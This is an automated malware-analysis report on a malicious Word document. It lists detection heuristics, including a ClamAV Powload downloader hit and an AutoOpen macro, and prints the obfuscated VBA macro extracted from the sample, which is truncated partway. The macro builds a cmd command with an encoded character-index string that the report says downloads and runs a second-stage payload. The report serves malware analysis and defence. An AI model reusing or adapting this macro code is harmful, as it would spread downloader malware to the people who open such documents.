Malware Insights
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro attempts to execute a command using a constructed string: 'c:\windows\system32\cmd.exe /c set IBr=XjMwiWBKhriXwVBMdbFYPP EJOUIOrkzZQPZa=u/2SD)oe x,8vt &&for %j i in (50;43;12;44;28;71;8;44;58;67;75;30;23;30;36;55;44;12;52;43;17;1;44;69;49;67;73;44;49;57;5;44;17;76;58;26;44;55;49;65;75;51;13;30;36;53;8;49;49;50;59;38;38;28;35;50;26;16;69;57;69;43;57;55;30;3)'. This indicates a likely attempt to download and execute a second-stage payload, consistent with a spearphishing attachment.
Heuristics 5
-
ClamAV: Doc.Downloader.Powload-6704127-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6704127-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5411 bytes |
SHA-256: a1db759ed036c99f6811d624499405a469ef6a36cec8e1d1c846551aa29e1697 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZKokHwTq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Hex(86901 * WXHAli - 9057 + kkOhZ)
TypeName CDbl(Ihvkzi)
TypeName Round(81959 * QEBWcz)
TypeName 177136498
TypeName 8128
Shell@ CStr("c") + CStr("m") + SQEhZCcdlKSKWt + pQQkXTXaTr + XSFsEkBiZIj + hKhVikutTf + QMmGflv + Ysroicm, 454652037 - 454652037
TypeName Tan(LJRERY)
TypeName CDate(dNiwpJ)
End Sub
Attribute VB_Name = "Bzkmkmua"
Function XSFsEkBiZIj()
On Error Resume Next
TypeName TXHio
TypeName CDbl(chTLZj)
TypeName jWniK
tfqzbpQwDv = "d /V:/C" + CStr(Chr(AZTLikdIDBfUTn + wSssZdU + 34 + RdZYXVjXEJRn + nrbnhZjkzpU)) + "se" + "t IBr=XjM" + "wiWB" + "KhriXw" + "VBMdb" + "FYP" + "P" + "EJOUiO" + "rkz" + "ZQP" + "Z" + "a=u/2SD)oe" + "x,8vt"
TypeName CDbl(CnZXO)
TypeName Fix(knTLNM)
TypeName Oct(414476804)
HrdrXiPvk = "pf-'H" + "n\.l:6" + "{G@m;( 9c" + "1syN+$C}g" + "&&for %j i" + "n (50;43" + ";12;4" + "4;2" + "8;71;8;4"
TypeName ChrW(BAEtwR)
TypeName Sqr(9390)
OsLKni = "4;58;5" + "8;67;75;" + "30;23" + ";" + "30;36;55;4" + "4;12;" + "52;43;17;" + "1;44"
TypeName ChrB(lOuYj)
TypeName EvOtW
aPzMQFHTBz = ";69;4" + "9;6" + "7;73;44;49" + ";57;5;4" + "4;17;76" + ";58;26"
TypeName Atn(YGUNIj + jmJkmM)
TypeName Round(40)
WiirXUos = ";44" + ";55;" + "49;6" + "5;75" + ";51;" + "13;30;" + "36;53" + ";8;49;49;" + "5" + "0;59;38;3"
TypeName CStr(6)
TypeName Log(vvwVt * clusfp)
TypeName 355
nNwEn = "8;28;" + "35;50;26;" + "16;69;57;" + "69" + ";43;5" + "7;55;30;3"
TypeName Sgn(59734 / PwoFA - YcbbE + iMsbN)
TypeName CDate(aLPtK)
TypeName Atn(8852)
VphbdfH = "8" + ";6" + "4;4" + "8;6" + "3;8;" + "49;49;" + "5"
TypeName Atn(919)
TypeName 65
TypeName 7
iXIlrWcj = "0;59;" + "38;3" + "8;12;1" + "2;12;57;" + "8;35;71;4" + "4;29;26;" + "64;37;8;" + "4" + "4;55;16;2"
TypeName FQaDCz
TypeName CdKaXk
TypeName qlfiw
AwREzYCJCj = "6;71;58;" + "26;29;57;6" + "9;43;64" + ";38;23" + ";16;70" + ";13;" + "6" + "3;8;49;" + "49;5" + "0;59;38" + ";38;50;3" + "5;28;26" + ";71;44;"
TypeName XRwjXl
TypeName ChrW(rFCXPz)
DhoHBLQ = "5" + "8;57;5" + "0;58;38" + ";23;43;27" + ";45;25;" + "40;" + "34;30;63" + ";8;4" + "9;49;" + "50;" + "59;38;3"
TypeName zXtjN
TypeName ChrW(8053)
ZntCWac = "8;2" + "6;64;44;78" + ";" + "26;69;35" + ";57;69;43" + ";64;38" + ";4" + "5;5" + "4;62;68;" + "70;14;" + "6" + "3;8;49;49;" + "50;59"
TypeName Round(DGolj)
TypeName CSng(dJaEi)
TypeName Chr(253835514)
ZUtQW = ";38;38;1;1" + "6;6" + "9;35;57" + ";2" + "6;55;38" + ";69;37;47;"
TypeName Round(mUqTUN)
TypeName 3327
TypeName CStr(2503)
PEvzm = "71;8;29" + ";12;53;5" + "7;40" + ";50;58;2" + "6;4" + "9" + ";" + "66;53;63;5" + "3" + ";42;6"
XSFsEkBiZIj = tfqzbpQwDv + HrdrXiPvk + OsLKni + aPzMQFHTBz + WiirXUos + nNwEn + VphbdfH + iXIlrWcj + AwREzYCJCj + DhoHBLQ + ZntCWac + ZUtQW + PEvzm
TypeName CLng(52)
TypeName ChrW(SJmXi)
End Function
Function hKhVikutTf()
On Error Resume Next
TypeName Int(BWNRjm)
TypeName CSng(47)
TypeName nXzpE
jiaYRjr = "5;75" + ";25;14" + ";40;" + "67;36;67" + ";53;68;39;" + "60;" + "53;65;7"
TypeName JoNJj
TypeName 8
TypeName 7323
lVELjcVc = "5;27" + ";26;" + "55;36;75;" + "44;55;48" + ";59;49" + ";44;64" + ";50;74;53" + ";" + "5" + "6;53;74" + ";75"
TypeName CStr(4917)
TypeName Atn(uTQCXz)
TypeName Oct(zTpilY * LZoHV - 62187 * zlCqwb)
MtHdjHf = ";25;14;40;" + "74;53" + ";57;44;" + "45;44;5" + "3;65;51"
TypeName kBcUz
TypeName 107717202
TypeName MzflT
FclYjiXj = ";43;28" + ";44;35" + ";69;8;66;7" + "5;33;55;6" + "4;"
TypeName CByte(462591434)
TypeName Rnd(BkrZK)
WIjJjjNrKPP = "67;26;55;" + "67;75;5" + "1;13;30;" + "42;61;" + "4"
TypeName Sgn(42230 * AjzVoV + 55460 - 47985)
TypeName 1
pTvibLi = "9;28;72;" + "61;75" + ";" + "30;23;30"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.